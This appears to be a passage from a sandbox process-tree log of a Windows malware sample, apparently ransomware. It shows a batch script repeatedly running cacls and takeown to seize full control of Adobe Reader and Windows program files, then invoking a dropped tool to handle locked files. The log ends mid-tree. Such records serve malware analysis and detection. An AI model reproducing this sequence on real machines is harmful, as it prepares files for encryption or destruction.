C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C3⤵PID:528
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"3⤵PID:1680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "distribute_form.gif" -nobanner3⤵PID:1088
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "distribute_form.gif" -nobanner4⤵PID:368
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1136
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""2⤵PID:472
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C3⤵PID:860
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"3⤵
- Modifies file permissions
PID:796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "main.css" -nobanner3⤵PID:1748
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "main.css" -nobanner4⤵PID:436
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:672
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""2⤵PID:548
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C3⤵PID:1492
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"3⤵PID:1828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "review_shared.gif" -nobanner3⤵PID:2032
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "review_shared.gif" -nobanner4⤵PID:1808
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1964
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""2⤵PID:1980
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:1948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"3⤵
- Modifies file permissions
PID:1152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner3⤵PID:1776
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner4⤵PID:1136
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1560
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""2⤵PID:1944
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C3⤵PID:1120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"3⤵PID:220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner3⤵PID:1832
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner4⤵PID:1784
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1796
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""2⤵PID:1408
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C3⤵PID:688
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"3⤵PID:1808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "MyriadPro-Regular.otf" -nobanner3⤵PID:1868
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "MyriadPro-Regular.otf" -nobanner4⤵PID:1964
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:908
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""2⤵PID:1476
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C3⤵PID:2036
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"3⤵PID:624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner3⤵PID:1776
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner4⤵PID:564
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""2⤵PID:224
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C3⤵PID:672
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"3⤵
- Modifies file permissions
PID:228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "can03.ths" -nobanner3⤵PID:1832
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "can03.ths" -nobanner4⤵PID:952
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:860
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""2⤵PID:1828
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C3⤵PID:1808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"3⤵PID:972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner3⤵PID:1168
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner4⤵PID:836
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1492
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""2⤵PID:1460
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C3⤵PID:1744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"3⤵PID:1960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "ROMAN.TXT" -nobanner3⤵PID:1684
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "ROMAN.TXT" -nobanner4⤵PID:2040
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1756
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""2⤵PID:1088
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C3⤵PID:672
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"3⤵PID:1788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "CP1257.TXT" -nobanner3⤵PID:964
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "CP1257.TXT" -nobanner4⤵PID:1340
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1944
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""2⤵PID:1748
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C3⤵PID:1808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"3⤵
- Modifies file permissions
PID:1956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "email_all.gif" -nobanner3⤵PID:908
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "email_all.gif" -nobanner4⤵PID:836
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1440
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""2⤵PID:1828
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C3⤵PID:1984
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"3⤵PID:1560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "open_original_form.gif" -nobanner3⤵PID:660
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "open_original_form.gif" -nobanner4⤵PID:1776
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:368
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""2⤵PID:1200
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C3⤵PID:1516
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"3⤵
- Modifies file permissions
PID:1796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "rss.gif" -nobanner3⤵PID:1020
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "rss.gif" -nobanner4⤵PID:1832
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:436
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""2⤵PID:1948
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C3⤵PID:1964
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"3⤵PID:1576
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "turnOffNotificationInTray.gif" -nobanner3⤵PID:1168
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "turnOffNotificationInTray.gif" -nobanner4⤵PID:1472
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""2⤵PID:548
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C3⤵PID:1744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"3⤵
- Modifies file permissions
PID:564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "CourierStd-Oblique.otf" -nobanner3⤵PID:796
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "CourierStd-Oblique.otf" -nobanner4⤵PID:1152
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""2⤵PID:624
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C3⤵PID:672
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"3⤵PID:952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "SY______.PFM" -nobanner3⤵PID:1996
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "SY______.PFM" -nobanner4⤵PID:220
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:860
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""2⤵PID:1784
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C3⤵PID:1808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"3⤵
- Modifies file permissions
PID:1232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner3⤵PID:856
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner4⤵PID:908
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""2⤵PID:1432
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C3⤵PID:1412
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"3⤵
- Modifies file permissions
PID:1560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "can129.hsp" -nobanner3⤵PID:1684
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "can129.hsp" -nobanner4⤵PID:660
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2036
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""2⤵PID:1488
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C3⤵PID:1556
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"3⤵PID:1796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "icudt26l.dat" -nobanner3⤵PID:964
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "icudt26l.dat" -nobanner4⤵PID:1020
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:680
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""2⤵PID:888
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C3⤵PID:972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"3⤵PID:1576
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "ROMANIAN.TXT" -nobanner3⤵PID:360
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "ROMANIAN.TXT" -nobanner4⤵PID:1168
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1440
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""2⤵PID:1332
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C3⤵PID:1680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"3⤵PID:564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "CP1258.TXT" -nobanner3⤵PID:1216
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "CP1258.TXT" -nobanner4⤵PID:796
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""2⤵PID:2036
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:976
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui"3⤵PID:1556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:1832
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "msoeres.dll.mui" -nobanner4⤵PID:1996
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:436
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui""2⤵PID:1828
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui" /E /G Admin:F /C3⤵PID:528
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui"3⤵PID:1232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "jnwdui.dll.mui" -nobanner3⤵PID:836
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "jnwdui.dll.mui" -nobanner4⤵PID:1868
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1408
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Journal\Templates\Genko_1.jtp""2⤵PID:1936
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Genko_1.jtp" /E /G Admin:F /C3⤵PID:1744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Genko_1.jtp"3⤵PID:1960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "Genko_1.jtp" -nobanner3⤵PID:660
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "Genko_1.jtp" -nobanner4⤵PID:796
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1756
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui""2⤵PID:1332
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:228
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui"3⤵PID:952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:1020
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:1996
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:680
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui""2⤵PID:2036
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui" /E /G Admin:F /C3⤵PID:1808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui"3⤵PID:1956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "JNTFiltr.dll.mui" -nobanner3⤵PID:360
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "JNTFiltr.dll.mui" -nobanner4⤵PID:1868
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp""2⤵PID:624
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp" /E /G Admin:F /C3⤵PID:1412
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp"3⤵
- Modifies file permissions
PID:564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "Dotted_Line.jtp" -nobanner3⤵PID:368
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "Dotted_Line.jtp" -nobanner4⤵PID:796
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1460
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui""2⤵PID:1936
-
